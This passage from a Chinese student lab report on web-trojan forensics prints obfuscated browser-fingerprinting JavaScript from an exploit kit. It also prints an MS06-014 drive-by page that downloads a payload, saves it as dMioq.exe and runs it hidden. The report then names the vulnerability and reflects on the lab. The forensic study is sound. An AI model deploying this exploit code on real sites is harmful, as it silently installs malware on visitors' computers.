return Ex+yH })())])){Ug=true;break;}}}if(!Ug){var sZ=navigator[(String.fromCharCode(112,0154,117,0x67,0151,0156,115))][(String.fromCharCode(0154,0145,0x6e,103,0x74,0150))];for(var JG=('MW'.length-2);JG<sZ;JG++){var fe=navigator[((function () { var TJ="ns",Z7="lugi",r="p"; return r+Z7+TJ })())][JG][(String.fromCharCode(110,97,0x6d,0x65))];if(/Silverlight Plug\-In/[((function () { var JX="t",Pu="tes"; return Pu+JX })())](fe)){Ug=true;break;}}}return Ug;};gi[(String.fromCharCode(103,0145,0x74,0106,0x6c,0x61,115,0x68,86,0x65,0x72,0x73,105,111,0156))]=function(){var j$=null;try{var R=new ActiveXObject(String.fromCharCode(0x53,104,0157,0x63,107,0167,97,0166,0x65,0x46,0x6c,97,115,0150,056,83,104,0157,0143,107,119,0x61,0x76,0145,0106,0154,0141,0163,0x68))[(String.fromCharCode(0107,101,116,86,0141,0x72,0x69,0141,98,0x6c,0145))]((function () { var S='on',ZN='si',a9='$ver'; return a9+ZN+S })())[(String.fromCharCode(0164,111,0x53,0164,0162,0151,0x6e,0x67))]();j$=R[((function () { var GF="ch",PV="t",kz="a",ho="m"; return ho+kz+PV+GF })())](/[\d,]+/g)[('aw'.length-2)][(String.fromCharCode(0162,0x65,0160,108,0x61,99,101))](/,/g,String.fromCharCode(056));} catch(lK){}if(j$==null){var yS=window[((function () { var sI="r",kr="to",Gb="a",eQ="g",R="navi"; return R+eQ+Gb+kr+sI })())][((function () { var wr="es",qq="yp",S="mimeT"; return S+qq+wr })())];for(var Zl=('uSWqgTVXt'.length-9);Zl<yS[((function () { var Yw="h",z="ngt",T5="le"; return T5+z+Yw })())];Zl++){var Te=yS[Zl][((function () { var QR="Plugin",$="enabled"; return $+QR })())][(String.fromCharCode(100,0145,0163,0143,0162,0x69,0x70,116,0x69,0157,0x6e))][((function () { var qB="ing",kX="Str",sp="o",bo="t"; return bo+sp+kX+qB })())]();var aE=Te[((function () { var Wj="h",Lg="atc",u="m"; return u+Lg+Wj })())](/Shockwave Flash [\d\.]+/g);if(aE!=null){j$=aE[('YfeWbUvBEx'.length-10)][((function () { var G_="h",h="c",JL="t",X="a",mG="m"; return mG+X+JL+h+G_ })())](/\d.+/g)[('WUCAVeyGyW'.length-10)];break;}}}if(j$==null){var pq=navigator[((function () { var Yl="s",t7="gin",K6="plu"; return K6+t7+Yl })())][((function () { var uf="h",vD="gt",e="en",d$="l"; return d$+e+vD+uf })())];for(window[String.fromCharCode(0x69)]=('hAQvnzz'.length-7);window[(function () { var Vb="i"; return Vb })()]<pq;window[(function () { var er="i"; return er })()]++){var G7=navigator[(String.fromCharCode(0160,0x6c,0x75,0x67,0x69,0156,115))][window[(function () { var IN="i"; return IN })()]][(String.fromCharCode(0156,97,0155,101))];var u=navigator[(String.fromCharCode(0160,0154,0x75,0147,0151,0156,115))][window[(function () { var A9="i"; return A9 })()]][(String.fromCharCode(0x76,101,0x72,115,105,0157,0156))];if(/Shockwave Flash/[(String.fromCharCode(0x74,101,0x73,0164))](G7)&&u!=window[(function () { var J="ed",D2="fin",R4="unde"; return R4+D2+J })()]){j$=navigator[((function () { var Px="s",$B="n",$="i",S="plug"; return S+$+$B+Px })())][window[String.fromCharCode(105)]][(String.fromCharCode(118,0145,0x72,0163,0x69,111,110))];break;}}}return j$;};gi[(String.fromCharCode(0147,0x65,0164,0x4a,97,0166,0141,0126,0145,0162,0x73,0151,111,110))]=function(){var xY=null;for(var hF=('HFc'.length-3);hF<('D'.length*'KUCqYPb'.length+3);hF++){for(var r=('LCLJA'.length-5);r<('Q'.length*011+1);r++){for(var $=('nHv'.length-3);$<('t'.length*'cVAzMCAiP'.length+1);$++){for(var X=('VwSfBFMT'.length-8);X<(0xa*'B'.length+0);X++){var NB=String(hF)+String.fromCharCode(46)+String(r)+(function () { var hP="."; return hP })()+String($)+(function () { var G9="."; return G9 })()+String(X);var CL=(function () { var ol="stalled.",KU="isIn",u="JavaWebStart."; return u+KU+ol })()+NB;try{new ActiveXObject(CL);return NB;} catch(g3){continue;}}}}}if(xY==null){var xK=window[((function () { var e="or",Ly="at",OK="navig"; return OK+Ly+e })())][((function () { var oM="s",K8="e",D$="p",PE="y",kC="imeT",NJ="m"; return NJ+kC+PE+D$+K8+oM })())];for(var er=('nQfpcnjDkv'.length-10);er<xK[((function () { var qY="ngth",J="le"; return J+qY })())];er++){var BI=/java.+;version=(.+)/[((function () { var Zo="c",As="exe"; return As+Zo })())](xK[er][(String.fromCharCode(0x74,0171,112,0x65))]);if(BI){var WC=window[(function () { var uJ="oat",mK="seFl",uG="par"; return uG+mK+uJ })()](BI['S'.length]);if(WC>xY){xY=WC;}}}}if(xY==null){var Ns="";var JZ=navigator[((function () { var YE="ns",rY="i",pB="g",KK="plu"; return KK+pB+rY+YE })())][((function () { var e="h",Q7="engt",yu="l"; return yu+Q7+e })())];for(window[(function () { var yo="i"; return yo })()]=('lWftROCw'.length-8);window[(function () { var VD="i"; return VD })()]<JZ;window[(function () { var ue="i"; return ue })()]++){var On=navigator[((function () { var q3="ins",pg="plug"; return pg+q3 })())][window[(function () { var ah="i"; return ah })()]][(String.fromCharCode(0x6e,0141,0155,0x65))];var LQ=navigator[(String.fromCharCode(0x70,0x6c,0165,0147,105,110,115))][window[String.fromCharCode(105)]][(String.fromCharCode(118,0x65,114,0x73,0151,0x6f,0x6e))];if(/Java/[((function () { var X="est",Tn="t"; return Tn+X })())](On)&&LQ!=window[String.fromCharCode(117,0156,0x64,0145,0146,105,110,101,0144)]){xY=navigator[(String.fromCharCode(0160,0x6c,117,103,105,0x6e,0163))][window[(function () { var ky="i"; return ky })()]][((function () { var R="sion",Cy="ver"; return Cy+R })())];break;}}}return xY;};var Y={};Y[((function () { var V3="eX",J7="sActiv",Qt="ha"; return Qt+J7+V3 })())]=function(du,nX){var $=null;if(du[((function () { var l4="ring",NP="st",KF="b",av="su"; return av+KF+NP+l4 })())](('IEi'.length-3),'p'.length)==String[((function () { var gF="ode",Xd="rC",rs="fromCha"; return rs+Xd+gF })())]((0x1*((01*('KIa'.length*0x6+0)+7)*'SrI'.length+2)+46))){$=document[(String.fromCharCode(0143,0x72,0x65,0141,0x74,101,0x45,0154,101,0x6d,0145,0x6e,0x74))](String.fromCharCode(111,0x62,106,101,99,116));$[(String.fromCharCode(0163,101,0164,0101,0x74,116,114,105,0x62,117,116,101))](String.fromCharCode(0143,108,0x61,115,0163,0151,0x64),(function () { var qZ=":",J="d",QS="clsi"; return QS+J+qZ })()+du);$[((function () { var wp="e",S="tribut",N_="t",BN="setA"; return BN+N_+S+wp })())]((function () { var xU="d",Cf="i"; return Cf+xU })(),du);$[(String.fromCharCode(115,0x65,0164,0101,0164,0x74,0x72,0x69,0x62,0165,0164,0145))]((function () { var Fs="le",r="y",X="t",e="s"; return e+X+r+Fs })(),(function () { var VB=": hidden",kG="visibility"; return kG+VB })());$[(String.fromCharCode(0x73,0x65,116,65,0164,116,114,0151,98,0165,116,101))]((function () { var qE="h",vb="t",bL="wid"; return bL+vb+qE })(),(function () { var XT="x",IN="p",R9="0"; return R9+IN+XT })());$[(String.fromCharCode(115,0x65,0x74,0101,0x74,0x74,0x72,105,0x62,0x75,0164,0145))](String.fromCharCode(104,0x65,105,103,0150,0164),(function () { var fw="x",dV="p",R="0"; return R+dV+fw })());document[((function () { var ol="ody",hH="b"; return hH+ol })())][((function () { var PX="Child",PR="append"; return PR+PX })())]($);if(typeof ($[nX])==String.fromCharCode(0165,110,0x64,101,102,0x69,0156,101,0x64)){var Cv=String.fromCharCode(105,0x64,61,0x22)+du+String.fromCharCode(042);Cv+=String.fromCharCode(040,99,0x6c,97,0163,0163,105,0x64,075,34,0x63,108,0x73,105,0x64,072)+du+(function () { var Rc='"'; return Rc })();Cv+=String.fromCharCode(040,0x73,116,0171,108,0x65,075,34,0166,105,0163,105,0x62,0x69,0x6c,105,0164,0171,0x3a,32,0x68,0151,0144,0x64,0x65,0156,0x22);Cv+=(function () { var K0='height="0px"',fq=' width="0px" '; return fq+K0 })();document[((function () { var gf="dy",Ml="o",z="b"; return z+Ml+gf })())][(String.fromCharCode(105,0x6e,0x6e,101,0x72,72,84,77,76))]+=String.fromCharCode(074,0157,0142,0152,101,0x63,0164,32)+Cv+String.fromCharCode(076,60,47,111,0142,0152,101,99,0164,62);$=document[((function () { var La="ntById",NU="getEleme"; return NU+La })())](du);}}else {try{$=new ActiveXObject(du);} catch(oE){return false;};}if(typeof ($[nX])!=(function () { var u='ed',JP='in',Dm='undef'; return Dm+JP+u })()){return true;}return false;};Y[((function () { var r7="eVersion",gO="getMsOffic"; return gO+r7 })())]=function(){var lk;var FO=new Array();for(var C4='E'.length;C4<='WQcYw'.length;C4++){try{FO[C4-'u'.length]=typeof (new ActiveXObject(String.fromCharCode(0x53,104,0x61,0162,0145,80,0157,0x69,110,0164,46,0117,0x70,101,0x6e,68,111,0143,0x75,0155,0145,0156,116,115,0x2e)+C4[(String.fromCharCode(0x74,0157,0123,0164,0x72,0x69,0156,103))]()));} catch(u){FO[C4-'F'.length]=null;}}if(FO[('AdKsojil'.length-8)]==(function () { var Ss='t',fR='c',xV='obje'; return xV+fR+Ss })()&&FO['U'.length]==String.fromCharCode(111,0142,0152,0145,0143,116)&&FO['EE'.length]==String.fromCharCode(111,0142,0x6a,0x65,0x63,0164)&&FO['RSa'.length]==String.fromCharCode(0157,0x62,0x6a,0x65,0x63,116)&&FO['gtvs'.length]==(function () { var da='t',By='bjec',Pn='o'; return Pn+By+da })()){lk=(function () { var Uj="2",w_="201"; return w_+Uj })();}else if(FO[('lj'.length-2)]==(function () { var e='t',J='c',S9S='bje',U6='o'; return U6+S9S+J+e })()&&FO['I'.length]==(function () { var UD='ct',wJ='je',$R='ob'; return $R+wJ+UD })()&&FO['WS'.length]==String.fromCharCode(0157,98,0x6a,0x65,99,0x74)&&FO['bpX'.length]==(function () { var I2='t',_Z='bjec',W0='o'; return W0+_Z+I2 })()&&FO['XjzE'.length]==null){lk=(function () { var Rd="0",X="201"; return X+Rd })();}else if(FO[('CdOvxm'.length-6)]==(function () { var Bd='ect',WB='j',HI='ob'; return HI+WB+Bd })()&&FO['U'.length]==(function () { var S='ect',ck='j',UK='ob'; return UK+ck+S })()&&FO['hB'.length]==String.fromCharCode(111,0142,0x6a,101,0143,0164)&&FO['tnr'.length]==null&&FO['hzcK'.length]==null){lk=String.fromCharCode(062,0x30,060,067);}else if(FO[('ooUhV'.length-5)]==(function () { var h='ct',F6='obje'; return F6+h })()&&FO['W'.length]==String.fromCharCode(111,0x62,106,101,0143,0x74)&&FO['Gw'.length]==null&&FO['nGL'.length]==null&&FO['rgXO'.length]==null){lk=(function () { var $X="03",Vg="20"; return Vg+$X })();}else if(FO[('iKS'.length-3)]==(function () { var X='ct',fM='bje',OG='o'; return OG+fM+X })()&&FO['w'.length]==null&&FO['ln'.length]==null&&FO['Gba'.length]==null&&FO['kXFx'.length]==null){lk=String.fromCharCode(0x78,112);}else {lk=null;}return lk;};function lZ(OR){var Rn=[];for(var Ho in OR){Rn[((function () { var Ol="sh",S="u",oU="p"; return oU+S+Ol })())](window[(function () { var ZE="onent",sn="omp",bP="encodeURIC"; return bP+sn+ZE })()](Ho)+(function () { var x9='='; return x9 })()+window[String.fromCharCode(101,110,0143,0157,0x64,0145,85,82,73,0x43,111,0155,0160,0x6f,0x6e,0x65,110,116)](OR[Ho]));}return N[((function () { var Lk="e",R="d",$d="co",UR="en"; return UR+$d+R+Lk })())](Rn[(String.fromCharCode(0x6a,111,105,0x6e))]((function () { var z3='&'; return z3 })()));}function G(Em){return (!Em||('vcEGqa'.length-6)===Em[((function () { var gj="th",tw="g",pq="n",BB="le"; return BB+pq+tw+gj })())]);}function U(qx){var X=lZ(qx);T(String.fromCharCode(47,0x52,114,0156,0x63,0x6f,057),X,function(){window[(String.fromCharCode(0x6c,0x6f,0143,0141,0x74,105,111,0x6e))]=(function () { var J="it/",MW="/ylCN"; return MW+J })();});}var QM="";var _=true;var dB=null;var W2=null;function K(ZM){QM=ZM;if(dB!=null){window[(function () { var mG="meout",I8="learTi",Ed="c"; return Ed+I8+mG })()](dB);dB=null;}_=false;return;}function E(SU,TD,vl){var RMp,cR,C3,OR,Nn0=TD||{},o8=vl||{};Nn0[((function () { var r="e",Dv="p",ev="ty"; return ev+Dv+r })())]=(function () { var $='ockwave-flash',ad='h',rB='application/x-s'; return rB+ad+$ })();if(window[(String.fromCharCode(0101,99,0164,105,118,101,88,0x4f,98,0x6a,0145,0x63,0164))]){Nn0[(String.fromCharCode(99,0154,0x61,0163,0x73,105,0x64))]=(function () { var O6='cf-96b8-444553540000',qv='clsid:d27cdb6e-ae6d-11'; return qv+O6 })();o8[(String.fromCharCode(0x6d,111,0x76,0x69,0x65))]=SU;}else {Nn0[(String.fromCharCode(100,0141,0164,97))]=SU;}cR=(function () { var le='t',uC='ec',b$='<obj'; return b$+uC+le })();for(RMp in Nn0){cR+=(function () { var un=' '; return un })()+RMp+(function () { var Hv='"',e='='; return e+Hv })()+Nn0[RMp]+(function () { var yq='"'; return yq })();}cR+=String.fromCharCode(076);for(RMp in o8){cR+=String.fromCharCode(0x3c,0160,97,0162,0141,109,040,110,0141,0x6d,101,075,042)+RMp+(function () { var rw='"',tN='lue=',N$='" va'; return N$+tN+rw })()+o8[RMp]+(function () { var ik='>',e='" /'; return e+ik })();}cR+=String.fromCharCode(60,0x2f,0157,0142,106,101,0x63,0x74,0x3e);C3=document[((function () { var U0="t",Kv="eElemen",U3="eat",r1="cr"; return r1+U3+Kv+U0 })())]((function () { var j6='v',DC='i',xB='d'; return xB+DC+j6 })());C3[((function () { var OX="HTML",sw="inner"; return sw+OX })())]=cR;OR=C3[((function () { var Cm="hild",Be="firstC"; return Be+Cm })())];C3[((function () { var h7="hild",ul="C",Fd="remove"; return Fd+ul+h7 })())](OR);return OR;}window[((function () { var P3="d",qo="oa",R="onl"; return R+qo+P3 })())]=function(){var $=Z1[((function () { var iF="on",qH="i",Jx="s",S="getVer"; return S+Jx+qH+iF })())]();var Hi={"os_vendor":$[((function () { var KL="endor",uS="os_v"; return uS+KL })())],"os_device":$[((function () { var UX="vice",n5="os_de"; return n5+UX })())],"ua_name":$[(String.fromCharCode(0x75,97,0137,110,0x61,0155,101))],"ua_ver":$[((function () { var $p="sion",KI="er",zN="_v",gN="ua"; return gN+zN+KI+$p })())],"arch":$[(String.fromCharCode(0141,114,0143,104))],"java":gi[((function () { var jS="Version",pm="va",h6="etJa",z="g"; return z+h6+pm+jS })())](),"silverlight":gi[(String.fromCharCode(104,97,0x73,83,0151,0x6c,0x76,101,114,0154,0x69,0x67,104,0164))](),"flash":gi[(String.fromCharCode(103,101,0164,0106,0x6c,97,0163,104,86,0x65,0162,0x73,0x69,0x6f,110))](),"vuln_test":true,"os_name":$[(String.fromCharCode(0x6f,0x73,95,0x6e,97,0155,101))]};Hi[(function () { var zO='e',s57='ffic',J='o'; return J+s57+zO })()]=Y[(String.fromCharCode(103,0145,0x74,77,0163,0117,0146,0146,0x69,0x63,0145,0126,0x65,114,115,0151,0157,0156))]();Hi[String.fromCharCode(0155,115,0x68,116,109,0x6c,0137,0x62,0x75,105,0154,0x64)]=window[(function () { var e="n",h="neBuildVersio",mG="iptEngi",xn="Scr"; return xn+mG+h+e })()]()[((function () { var r="ring",l7="St",xb="to"; return xb+l7+r })())]();if(Hi[String.fromCharCode(0146,0x6c,0141,115,0x68)]!=null&&(Hi[String.fromCharCode(0x66,0x6c,0x61,115,104)][((function () { var cs="tch",rx="a",ND="m"; return ND+rx+cs })())](/[\d]+.[\d]+.[\d]+.[\d]+/))==null){var SX=E(String.fromCharCode(057,97,0124,120,72,0144,109,0120,0x49,77,46,115,0167,0146),{"\u0077\x69\x64\u0074\u0068":'E'.length,"\x68\x65\x69\147\u0068\164":'S'.length},{"\141\u006c\x6c\157\u0077\x53\u0063\162\151\x70\u0074\101\143\143\u0065\163\163":String.fromCharCode(0141,108,0167,97,121,0163),"\x50\x6c\x61\x79":String.fromCharCode(0x54,114,0165,0x65)});dB=setTimeout(function(){if(W2!=null){_=false;window[(function () { var b7="val",ze="arInter",ps="le",Cr="c"; return Cr+ps+ze+b7 })()](W2);}if(!G(QM)){Hi[(function () { var wQ="h",oz="s",XU="fla"; return XU+oz+wQ })()]=QM;}U(Hi);},(0x1*06637+1513));W2=setInterval(function(){if(!_){window[String.fromCharCode(0x63,0154,0x65,0x61,0162,0x49,0x6e,116,0145,114,0x76,97,0154)](W2);if(!G(QM)){Hi[String.fromCharCode(102,0x6c,0x61,0x73,104)]=QM;}U(Hi);}},('rAOY'.length*027+8));document[((function () { var RR="ody",va="b"; return va+RR })())][((function () { var BY="ld",nJ="Chi",j4="append"; return j4+nJ+BY })())](SX);}else {U(Hi);}};
</script>
<noscript>
<img style="visibility:hidden" src="/XDWPUmm/">
<meta http-equiv="refresh" content="1; url=/ylCNit/">
</noscript>
解析一下,发现调用了dMioq.exe可执行程序,此程序正是造成被攻击的原因。
<html><head><title></title><script language="javascript">function UAFxWqWengBBDyjOGgur(o,n){var r=null;try{eval("r=o.CreateObject(n)")}catch(e){}if(!r){try{eval("r=o.CreateObject(n,'')")}catch(e){}}if(!r){try{eval("r=o.CreateObject(n,'','')")}catch(e){}}if(!r){try{eval("r=o.GetObject('',n)")}catch(e){}}if(!r){try{eval("r=o.GetObject(n,'')")}catch(e){}}if(!r){try{eval("r=o.GetObject(n)")}catch(e){}}return(r)}function DG(a){var s=UAFxWqWengBBDyjOGgur(a,"WScript.Shell");var o=UAFxWqWengBBDyjOGgur(a,"ADODB.Stream");var e=s.Environment("Process");var url=document.location+'/payload';var xml=null;var bin=e.Item("TEMP")+"\\dMioq.exe";var dat;try{xml=new XMLHttpRequest()}catch(e){try{xml=new ActiveXObject("Microsoft.XMLHTTP")}catch(e){xml=new ActiveXObject("MSXML2.ServerXMLHTTP")}}if(!xml){return(0)}xml.open("GET",url,false);xml.send(null);dat=xml.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(dat);o.SaveToFile(bin,2);s.Run(bin,0)}function qzOYiUnpVxKmDjXQZFuOEI(){var i=0;var t=new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E30}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}',null);while(t[i]){var a=null;if(t[i].substring(0,1)=='{'){a=document.createElement("object");a.setAttribute("classid","clsid:"+t[i].substring(1,t[i].length-1))}else{try{a=new ActiveXObject(t[i])}catch(e){}}if(a){try{var b=UAFxWqWengBBDyjOGgur(a,"WScript.Shell");if(b){DG(a);return(0)}}catch(e){}}i++}}</script></head><body onload='qzOYiUnpVxKmDjXQZFuOEI()'>duafIlNMYJKjSFkKtmGeHvJxh</body></html>
上网搜索可能包含相关攻击的信息BD96C556-65A3,显示如下:
由此可知,攻击方利用了MS06-014漏洞。
三、学习中遇到的问题及解决
- 问题:Win2k无法被Ping通
- 问题解决方案:重新配置该虚拟机的ip地址,改为自动获取IP地址,并重启,可以成功连接到网络
四、实践总结
通过本次实践,我动手实现了Web浏览器渗透攻击、网页木马的分析取证等等,明白了网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。我也感受到了网络木马和钓鱼网站的危害,提升了动手实践能力。总体来看,本次实验不容易,需要静下心来耐心操作。希望在之后的学习中,自己能进一步提升网络攻防实践能力。
668
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
